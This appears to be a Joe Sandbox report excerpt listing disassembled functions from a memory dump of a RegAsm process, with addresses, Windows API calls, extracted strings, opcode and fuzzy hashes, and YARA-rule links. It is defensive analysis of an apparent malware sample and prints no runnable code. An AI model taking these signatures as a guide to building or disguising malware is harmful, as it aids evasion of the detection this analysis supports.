Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
Instruction ID: 050cd24433f61f3763ad39defb1fc8a13c057351b8bc1ee48cf204f6d01fffd2
Opcode Fuzzy Hash: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
Instruction Fuzzy Hash: 77C15B727083204BD714CF28E8923ABBBD2EBD1304F59853EE8968B381D63DDD058799

Function 00440330 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
Instruction ID: 58a69b57af7e24ee3c62efa82a7d8eee2b8501685cdd5d883de90afc41c95a7c
Opcode Fuzzy Hash: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
Instruction Fuzzy Hash: 728126326083109BE728CF14C85176BB7E2EFC5314F19852EEA9647391DB79DC158B8A

Function 0043F9D0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
Instruction ID: 448ffca5d87b80d32822c8b64973462d570a6b027f83770f115344b2745d6aa8
Opcode Fuzzy Hash: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
Instruction Fuzzy Hash: A6813976A183055BD714AF18C85073BB3E2FFC9350F09A43EE8858B351EB38E915979A

Function 00438330 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
Instruction ID: 767567ce47251ea28a1813ea366a1b038ceed0e869b8d918d7d8446cf86f5ca2
Opcode Fuzzy Hash: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
Instruction Fuzzy Hash: 2D517C766083015BD7148B28C85473BF7A1EBDA754F29A47EF4C66B382EA34DC01879A

Function 00435700 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aef522f5c412efac3870b29e6139df53269058b65c72c00b5ca752452ad1b128
Instruction ID: ba30e3e1c8183f5b2a8e927c640739866bd9532221f5637e1c98050d3e359662
Opcode Fuzzy Hash: aef522f5c412efac3870b29e6139df53269058b65c72c00b5ca752452ad1b128
Instruction Fuzzy Hash: 88515B34708750DFD314AB2C9C84A2FB7A6EBDA350F58A92DE4D187251D339DC12C7AA

Function 0041DAD0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
Instruction ID: 6a3c87ed268c674eb99f3637c0156bf68a3d7e0a263c8b87bddcd13a1fbb2be6
Opcode Fuzzy Hash: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
Instruction Fuzzy Hash: EB312A75A08604EFD704DF28DC45BAB77E8EB8A354F14493DF849C7281E238D94587AA

Function 00411204 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000001), ref: 00411317
ExitProcess.KERNEL32(00000003), ref: 00411337
ExitProcess.KERNEL32(00000001), ref: 00411357
ExitProcess.KERNEL32(00000001), ref: 00411377

Strings

Z, xrefs: 00411264

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: Z
API String ID: 621844428-1505515367
Opcode ID: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
Instruction ID: 7ac7095e787f66665aa3dcbb55ee2acb77b64e2a3ff96d475d68631c8037dee2
Opcode Fuzzy Hash: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
Instruction Fuzzy Hash: 4531F5B0A5979047F711A721A822BEF77D4AF92358F04093DE589A3283DB3D5509829F

Function 0040D400 Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0040D44A
GetForegroundWindow.USER32 ref: 0040D450
GetCurrentProcessId.KERNEL32 ref: 0040D45A
ExitProcess.KERNEL32 ref: 0040D47A

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
Instruction ID: a18b284b2e66d058522ee5bde7d4ca9708ea0d3b90004192466f8b4187448e12
Opcode Fuzzy Hash: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
Instruction Fuzzy Hash: D0F0F07090820047D7147FB2981E72E7B51AF52B8EF00447EA5C6BB2D7DE3D94058A2E

Function 0042CBE4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE ref: 0042CC2A

Strings

m>hF, xrefs: 0042CC46

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID: m>hF
API String ID: 3890896728-898274283
Opcode ID: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
Instruction ID: 61c423f2da36b7ac1fa402b5061fcb009773d313ebc379a7c9e230c2ac7043c6
Opcode Fuzzy Hash: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
Instruction Fuzzy Hash: 88F074B45087019FE354DF29D5A871ABBF0FB84304F00891CE5D99B3A0DBB5AA49CF86

Function 0043C3CE Relevance: 3.0, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C3CE
GetForegroundWindow.USER32 ref: 0043C3DD

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
Instruction ID: 3d74f6937b0da6f9bb753501b6533d13d5f28c94efa54478c9cbf2e46fb409f1
Opcode Fuzzy Hash: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
Instruction Fuzzy Hash: 81D0A9BA5120009BA209EB22BC0A84F3216AF8AA0F7244479E40702296EF265602C78F

Function 00438266 Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043831E

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
Instruction ID: f83ec565af989f546f89ac4021099bd9b02803395ba86297f2ea752137e99ac7
Opcode Fuzzy Hash: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
Instruction Fuzzy Hash: A0117A37E066108BD31CCB28CC9166AB713EBC1315F2DC27DC952977A8CE350C0186C4

Function 0042F451 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042F495

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
Instruction ID: 18e0713c30ec81aa62a71d0ecc001b21a065892b9bc9aeccd5b104f9934267ec
Opcode Fuzzy Hash: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
Instruction Fuzzy Hash: BDF07AB450C341CFE754DF28C5A871BBBE0BB89314F10891CE5998B390C7B59549CF82

Function 00410BD0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00410BE3

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
Instruction ID: b4532f2fe372d2cb61c90b12c54696faac8a3f2e77a6efe18e9fc46a379e6e33
Opcode Fuzzy Hash: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
Instruction Fuzzy Hash: E9D09720A948002BD208AB3CEC0AF223A5CEB43726F400238FA938A1C3EC802910C178

Function 00410C05 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410C17

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
Instruction ID: f1029602b035823865252b0fa187f8e0862bec21c64ceb27c466c7e5c6614e77
Opcode Fuzzy Hash: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
Instruction Fuzzy Hash: 54D0C9343E47417BF9248B08AC13F143250670AF1AF700765B322FE2E6C9D071218A0D

Function 00438212 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438218

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
Instruction ID: 210aa2dafe0433a51058e8b7290a016339c139d8b012400ed691351da44ce6b3
Opcode Fuzzy Hash: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
Instruction Fuzzy Hash: 0DB092322802045AE9001B48BC05BA4B718EB8066BF200072EA0C880A2D113997A96A8

Non-executed Functions

Function 00433BC3 Relevance: 92.9, Strings: 74, Instructions: 377COMMON

Download Yara Rule

Strings

I, xrefs: 00433C7E
/, xrefs: 00433D57
x, xrefs: 00433CE7
=, xrefs: 00433C85
], xrefs: 00433CD2
\, xrefs: 00433FE1
w, xrefs: 00433D88
G, xrefs: 00433C38
n, xrefs: 00433C69
K, xrefs: 00433C8C
[, xrefs: 00433CFC
}, xrefs: 00433DB2
0, xrefs: 00433C5B
{, xrefs: 00433DDC
=, xrefs: 00433BF2
$, xrefs: 00433CBD
9, xrefs: 00433C31
C, xrefs: 00433C54
M, xrefs: 00433C62
t, xrefs: 00433C93
G, xrefs: 00433C15
u, xrefs: 00433D7A
X, xrefs: 00433DC7
_, xrefs: 00433CE0
X, xrefs: 00433FD1
4, xrefs: 00434111
O, xrefs: 00433C07
s, xrefs: 00433DA4
E, xrefs: 00433BDD
[, xrefs: 00433FE9
x, xrefs: 0043413C
|, xrefs: 00433BCF
k, xrefs: 00433D6C
$, xrefs: 00433CA1
A, xrefs: 00433C46
4, xrefs: 00433C77
S, xrefs: 00433CC4
?, xrefs: 00433CD9
z, xrefs: 0043412E
^, xrefs: 00433FC9
!, xrefs: 00433C3F
1, xrefs: 00433BD6
e, xrefs: 00433D0A
m, xrefs: 00433D42
|, xrefs: 00433CCB
g, xrefs: 00433D18
O, xrefs: 00433C70
G, xrefs: 00433BF9
W, xrefs: 00433CA8
;, xrefs: 00433C1C
?, xrefs: 00433C00
4, xrefs: 00433C4D
U, xrefs: 00433C9A
E, xrefs: 00433C2A
{, xrefs: 00434135
Y, xrefs: 00433CEE
3, xrefs: 00433BE4
\, xrefs: 00433D73
q, xrefs: 00433D96
Q, xrefs: 00433FD9
5, xrefs: 00433D81
d, xrefs: 00433C23
9, xrefs: 00433C0E
c, xrefs: 00433D34
}, xrefs: 00434127
i, xrefs: 00433D5E
a, xrefs: 00433D26
s, xrefs: 00433FC1
-, xrefs: 00433CAF
/, xrefs: 00433CF5
`, xrefs: 00433D65
Q, xrefs: 00433CB6
o, xrefs: 00433D50
y, xrefs: 00433DCE

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !$$$$$-$/$/$0$1$3$4$4$4$5$9$9$;$=$=$?$?$A$C$E$E$G$G$G$I$K$M$O$O$Q$Q$S$U$W$X$X$Y$[$[$\$\$]$^$_$`$a$c$d$e$g$i$k$m$n$o$q$s$s$t$u$w$x$x$y$z${${$|$|$}$}
API String ID: 0-820961518
Opcode ID: 339af22f8c4a3c862ce8e755a1ca619eec30ca32c64d3e594b007781363fc15c
Instruction ID: f4bcad29702f157c3cefc34962ef123d3d3efc20493ef9614d1a3a652905d945
Opcode Fuzzy Hash: 339af22f8c4a3c862ce8e755a1ca619eec30ca32c64d3e594b007781363fc15c
Instruction Fuzzy Hash: A3223F209087D9C9DB22C67C8C087DDBFB15B67324F0842D9D1E96B3D2C7B90A85CB66

Function 004333D3 Relevance: 61.5, Strings: 49, Instructions: 292COMMON

Download Yara Rule

Strings

K, xrefs: 00433448
x, xrefs: 004337D3
/, xrefs: 0043350C
+, xrefs: 0043369F
], xrefs: 004334AA
{, xrefs: 004337CC
<, xrefs: 00433583
u, xrefs: 00433402
U, xrefs: 004334E2
A, xrefs: 0043348E
}, xrefs: 004337BE
!, xrefs: 0043356E
-, xrefs: 004336B7
0, xrefs: 004337A8
s, xrefs: 00433410
Q, xrefs: 004334FE
C, xrefs: 00433480
z, xrefs: 004337C5
7, xrefs: 004336CF
[, xrefs: 004334B8
', xrefs: 00433544
6, xrefs: 004336D3
q, xrefs: 0043341E
w, xrefs: 004333F4
G, xrefs: 00433464
I, xrefs: 00433456
}, xrefs: 0043369B
/, xrefs: 004336AF
y, xrefs: 004333E6
+, xrefs: 00433528
Y, xrefs: 004334C6
), xrefs: 00433536
E, xrefs: 00433472
?, xrefs: 0043357C
<, xrefs: 00433671
#, xrefs: 00433560
), xrefs: 004336A7
5, xrefs: 004336D7
=, xrefs: 0043358A
3, xrefs: 004336BF
M, xrefs: 0043343A
O, xrefs: 0043342C
-, xrefs: 0043351A
_, xrefs: 0043349C
W, xrefs: 004334D4
%, xrefs: 00433552
>, xrefs: 0043367A
1, xrefs: 004336C7
S, xrefs: 004334F0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !$#$%$'$)$)$+$+$-$-$/$/$0$1$3$5$6$7$<$<$=$>$?$A$C$E$G$I$K$M$O$Q$S$U$W$Y$[$]$_$q$s$u$w$x$y$z${$}$}
API String ID: 0-2070561298
Opcode ID: f3d64a450cf2e668f55d042d9289189a42784ed311261cb84e83574484c63db2
Instruction ID: 1734192de7dcf15adbd05d536859822b1289bcf108e7d1c33d9b34ffd1470de9
Opcode Fuzzy Hash: f3d64a450cf2e668f55d042d9289189a42784ed311261cb84e83574484c63db2
Instruction Fuzzy Hash: 98E1A431C086E98ADB32CA388C583DD7FB15B56314F0842D9D4A96B3D2C7B94B86CB56

Function 00401000 Relevance: 23.3, Strings: 17, Instructions: 2035COMMON

Download Yara Rule

Strings

, xrefs: 004037B2
gfff, xrefs: 00402555
, xrefs: 004037B9
, xrefs: 004037C0
0123456789abcdefxp, xrefs: 004013EE, 0040145E
, xrefs: 0040379D
gfff, xrefs: 004025BF
, xrefs: 00403836
0123456789ABCDEFXP, xrefs: 004013E4, 00401451
-, xrefs: 00402507
A, xrefs: 004024EB
@, xrefs: 0040303E
., xrefs: 00401BCB
, xrefs: 004037AB
, xrefs: 004037A4
gfff, xrefs: 00402605
gfff, xrefs: 0040256A

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $-$.$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff$gfff
API String ID: 0-1406891699
Opcode ID: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
Instruction ID: 487080ebca6db4a2f4a63b791c6092a307c28b1da33addde68164491a41eba4e
Opcode Fuzzy Hash: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
Instruction Fuzzy Hash: FAE2F1716083418FC718CF28C49462BBBE2ABD5314F18867EE895AB3D1D779DD06CB86

Function 0041A360 Relevance: 22.8, Strings: 17, Instructions: 1503COMMON

Download Yara Rule

Strings

0123, xrefs: 0041A732
?, xrefs: 0041A78A
<=>?, xrefs: 0041A727
X_, xrefs: 0041AB2F
x, xrefs: 0041ABAE
R*, xrefs: 0041A57E
XY, xrefs: 0041B5FD
!./7, xrefs: 0041A5C0
URSP, xrefs: 0041A531
1>?<, xrefs: 0041A594
anol, xrefs: 0041A510
$%&', xrefs: 0041A6DA
LM, xrefs: 0041B1D5
*?, xrefs: 0041A589
, xrefs: 0041AC8B
AC, xrefs: 0041B1CD
ecw, xrefs: 0041B4F0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ecw$ $!./7$$%&'$0123$1>?<$<=>?$LM$R*$URSP$XY$X_$anol$x$*?$AC$?
API String ID: 0-1210905185
Opcode ID: 8c699229cc670e09099e6e6c3fe2814967911f2cbf5d1e2d4967f983fc21b8a1
Instruction ID: 05554d4b74cb37f00c522ddf28400aba285cffaf9a4d0509761738ac056082fa
Opcode Fuzzy Hash: 8c699229cc670e09099e6e6c3fe2814967911f2cbf5d1e2d4967f983fc21b8a1
Instruction Fuzzy Hash: 19B29D701093818BD7248F25C8957EBBBE1EFD6314F18896EE4C98B391D7788849CB97

Function 00401277 Relevance: 21.0, Strings: 16, Instructions: 953COMMON

Download Yara Rule

Strings

0000, xrefs: 004038E3
,, xrefs: 00401E1F
0, xrefs: 00401EB0
0000, xrefs: 00403906
@, xrefs: 00402391
0000, xrefs: 004038F8
i, xrefs: 0040291C
0000, xrefs: 004038FF
0, xrefs: 00402233
0, xrefs: 004023DB
0000, xrefs: 004038DC
0000, xrefs: 004038F1
0000, xrefs: 004038EA
0, xrefs: 004023B8
0, xrefs: 00402411
., xrefs: 00402248

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,$.$0$0$0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
API String ID: 0-592371532
Opcode ID: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
Instruction ID: f632d19e1011d4e84aad26c661c6e5d435a4fac7925595ca077130d337c29d85
Opcode Fuzzy Hash: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
Instruction Fuzzy Hash: 2B72E3756093418FD314CE28C58475BBBE1BBC5304F188A7EE89AA73D1D3B9DD058B8A

Function 00424C70 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

XZB, xrefs: 00425A52
xZB, xrefs: 00425A72
RZB, xrefs: 00425A43
}z{x, xrefs: 00425AF4
ps, xrefs: 00425666
01, xrefs: 00425789
F}w, xrefs: 004257A2

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 01$F}w$RZB$XZB$ps$xZB$}z{x
API String ID: 0-2234522390
Opcode ID: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
Instruction ID: 7c75d544a8c29c11e0f6f274e536c446b85ab27432b89beb213d306bd112cb90
Opcode Fuzzy Hash: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
Instruction Fuzzy Hash: EBF145B1A183508FD3208F65E88576BBBE1FBC6318F498A2DE4D49B351D7788805CB97

Function 00425892 Relevance: 14.4, Strings: 11, Instructions: 638COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00425FE6
n\+H, xrefs: 00425EBC
hX]N, xrefs: 00425EC4
%AUU, xrefs: 00425EB4
-HOE, xrefs: 00425EDC
iP`R, xrefs: 00425EAC
b_B, xrefs: 00425F5C
1&sK, xrefs: 00425ECC
K, xrefs: 00425EE4
J@C}, xrefs: 00425ED4
"eB, xrefs: 004264C1

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "eB$%AUU$-HOE$1&sK$J@C}$K$b_B$hX]N$iP`R$n\+H$}z{x
API String ID: 0-3978276490
Opcode ID: 3a202b28c06623f95f6a78a224322fe7c85f50eda731053422013ad5c0061595
Instruction ID: 2c76b4855d7d086daea3e7ef22f53aba57eb26247f52438ac759ecf5515040aa
Opcode Fuzzy Hash: 3a202b28c06623f95f6a78a224322fe7c85f50eda731053422013ad5c0061595
Instruction Fuzzy Hash: 4D2257B5A08390CFD720CF28E89031B7BE1EF86314F4A897DE5954B391D7799905CB86

Function 00425B22 Relevance: 14.3, Strings: 11, Instructions: 578COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00425FE6
n\+H, xrefs: 00425EBC
hX]N, xrefs: 00425EC4
%AUU, xrefs: 00425EB4
-HOE, xrefs: 00425EDC
iP`R, xrefs: 00425EAC
b_B, xrefs: 00425F5C
1&sK, xrefs: 00425ECC
K, xrefs: 00425EE4
J@C}, xrefs: 00425ED4
"eB, xrefs: 004264C1

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "eB$%AUU$-HOE$1&sK$J@C}$K$b_B$hX]N$iP`R$n\+H$}z{x
API String ID: 0-3978276490
Opcode ID: df7cad00a625e098bc6b21d4f6573bef2ce1c3d3ef59cac0483e1abd0491368e
Instruction ID: 1e899f14d43eb0edde7ea3f87979c932d9ec8e59681a08b37ca417adc0d56f8c
Opcode Fuzzy Hash: df7cad00a625e098bc6b21d4f6573bef2ce1c3d3ef59cac0483e1abd0491368e
Instruction Fuzzy Hash: 6D1234B5608390CFD720CF28E88035BBBE1EF86314F4A897DE5948B391C7799909CB56

Function 0041B840 Relevance: 10.7, Strings: 8, Instructions: 731COMMON

Download Yara Rule

Strings

-[Z], xrefs: 0041BC04
5K&M, xrefs: 0041BBE4
\], xrefs: 0041BE0F
?G!Y, xrefs: 0041BBFC
E7DI, xrefs: 0041BBDC
b?Y1, xrefs: 0041BC25
O?A, xrefs: 0041BBEC
1C?E, xrefs: 0041BBF4

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: O?A$-[Z]$1C?E$5K&M$?G!Y$E7DI$\]$b?Y1
API String ID: 0-3992915487
Opcode ID: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
Instruction ID: 35d513b67ffc3e6f3b7f570dc22d0295eeba515840fa069767b96105834fc068
Opcode Fuzzy Hash: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
Instruction Fuzzy Hash: BD2222B5508340DFC704CF25D8926ABBBE0EF95314F04892DF4D59B391E7788949CB9A

Function 00418782 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 224threadwindowCOMMON

Download Yara Rule

APIs

FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 00418873
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00418897
IsWindowEnabled.USER32(00000000), ref: 004188BE
IsWindowEnabled.USER32(00000000), ref: 004188C1
IsWindowVisible.USER32(00000000), ref: 004188DC

Strings

,-, xrefs: 0041881A

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Window$Enabled$FindProcessThreadVisible
String ID: ,-
API String ID: 1745434793-1027024164
Opcode ID: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
Instruction ID: 56b84fc87cb1ca2f63d5938239228ea87b56aac7768e10c7d6da1a857d4098df
Opcode Fuzzy Hash: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
Instruction Fuzzy Hash: 3091B171208782CFC725CF29D8506AFBBE1BFC6304F198A6EE49587392DA34D945CB46

Function 00423DD0 Relevance: 10.5, Strings: 8, Instructions: 483COMMON

Download Yara Rule

Strings

5M0O, xrefs: 00423E7F
}z{x, xrefs: 00424146
(],_, xrefs: 00423E5F
a%a', xrefs: 00423E4F
}z{x, xrefs: 00424436
7E9G, xrefs: 00423E8F
!Y)[, xrefs: 00423E57
9Q>S, xrefs: 00423E67

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

